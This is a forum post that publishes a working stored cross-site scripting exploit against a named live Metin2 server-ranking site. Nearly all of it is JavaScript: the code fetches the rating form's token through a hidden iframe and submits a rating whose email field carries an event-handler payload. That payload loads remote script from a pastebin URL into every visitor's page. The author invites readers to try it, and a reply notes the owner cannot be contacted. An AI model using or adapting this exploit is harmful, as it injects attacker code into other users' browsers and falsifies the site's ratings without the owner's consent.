Jump to content
metho

security metin2pserver.info - Javascript code injection example

Recommended Posts

Hi,

Here is a small example of a code injection on the top list: metin2pserver.info.

 

If you want to test it yourself:

 

I hosted the following script here ( https://pastebin.com/raw/28VjB803 ): 

 

/**
 * Rate.
 *
 * @param {string} serverId
 * @param {string} name
 * @param {string} email
 * @param {number} rating
 * @option 1 - Insufficient
 * @option 2 - Inadequate
 * @option 3 - Sufficient
 * @option 4 - Satisfying
 * @option 5 - Good
 * @option 6 - Very good
 * @param {string} comment
 * @param {number} picture
 * @option 1 - Warrior (m)
 * @option 2 - Warrior (f)
 * @option 3 - Ninja (m)
 * @option 4 - Ninja (f)
 * @option 5 - Sura (m)
 * @option 6 - Sura (f)
 * @option 7 - Shaman (m)
 * @option 8 - Shaman (f)
 */
function rate(serverId, name, email, rating, comment, picture = 1) {
    const root = document.documentElement;
    const iframe = document.createElement('iframe');
    iframe.style.setProperty('display', 'none');
    iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`;

    return new Promise((resolve) => {
        iframe.onload = () => {
            const [s] = iframe.contentDocument.getElementsByName('s');
            const token = s && s.value;

            root.removeChild(iframe);

            const data = {
                Name: name,
                Email: email,
                Rating: rating,
                Comments: comment,
                pic: picture,
                id: serverId,
                s: token,
            };

            const params = [];

            for (const param in data) {
                const value = data[param];
                params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
            }

            const body = params.join('&');

            if (token) {
                fetch(iframe.src, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
                    },
                    body,
                })
                    .then(() => resolve(true))
                    .catch(() => resolve(false));
            } else {
                resolve(false);
            }
        };

        root.appendChild(iframe);
    });
}

if (location.hash === '#methowashere') {
    const serverId = /server-(.*?).html/.exec(location.href)[1];

    const name = prompt('Your name');
    const comment = prompt('Your comment');

    rate(serverId, name, '', 1, comment);
}

To inject it, go to a server page (e. g.: https://www.metin2pserver.info/server-mt2aom2.html).
 

Launch this script on the page:

 

/**
 * Rate.
 *
 * @param {string} serverId
 * @param {string} name
 * @param {string} email
 * @param {number} rating
 * @option 1 - Insufficient
 * @option 2 - Inadequate
 * @option 3 - Sufficient
 * @option 4 - Satisfying
 * @option 5 - Good
 * @option 6 - Very good
 * @param {string} comment
 * @param {number} picture
 * @option 1 - Warrior (m)
 * @option 2 - Warrior (f)
 * @option 3 - Ninja (m)
 * @option 4 - Ninja (f)
 * @option 5 - Sura (m)
 * @option 6 - Sura (f)
 * @option 7 - Shaman (m)
 * @option 8 - Shaman (f)
 */
function rate(serverId, name, email, rating, comment, picture = 1) {
    const root = document.documentElement;
    const iframe = document.createElement('iframe');
    iframe.style.setProperty('display', 'none');
    iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`;

    return new Promise((resolve) => {
        iframe.onload = () => {
            const [s] = iframe.contentDocument.getElementsByName('s');
            const token = s && s.value;

            root.removeChild(iframe);

            const data = {
                Name: name,
                Email: email,
                Rating: rating,
                Comments: comment,
                pic: picture,
                id: serverId,
                s: token,
            };

            const params = [];

            for (const param in data) {
                const value = data[param];
                params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
            }

            const body = params.join('&');

            if (token) {
                fetch(iframe.src, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
                    },
                    body,
                })
                    .then(() => resolve(true))
                    .catch(() => resolve(false));
            } else {
                resolve(false);
            }
        };

        root.appendChild(iframe);
    });
}

/**
 * Inject.
 *
 * @param {string} script
 * @param {string} name
 */
function injectScript(script, name = 'Dummy') {
    const serverId = /server-(.*?).html/.exec(location.href)[1];
    const code = `$.getScript('${script}')`;
    const injection = `"style="animation:fb_transform"onanimationstart="${code}"`;

    console.log(`Server: ${serverId}`);
    console.log(`Name: ${name}`);
    console.log(`Script: ${script}`);
    console.log(`Injections: ${injection}`);

    return rate(serverId, name, injection, 1, '[...]');
}

You can then inject it like this:

 

injectScript('https://pastebin.com/raw/28VjB803').then((r) => console.log('Result: ', r));

You can then test it like this: https://www.metin2pserver.info/server-UGMT2.html#mailsywashere

 

Have fun 👺

Edited by metho
Incorrect link (see edit history)

Share this post


Link to post

There is no contact adress that can inform the creator of the website about this, maybe he can see this post and fix it.

Share this post


Link to post

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

Terms of Use / Privacy Policy / Guidelines / We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.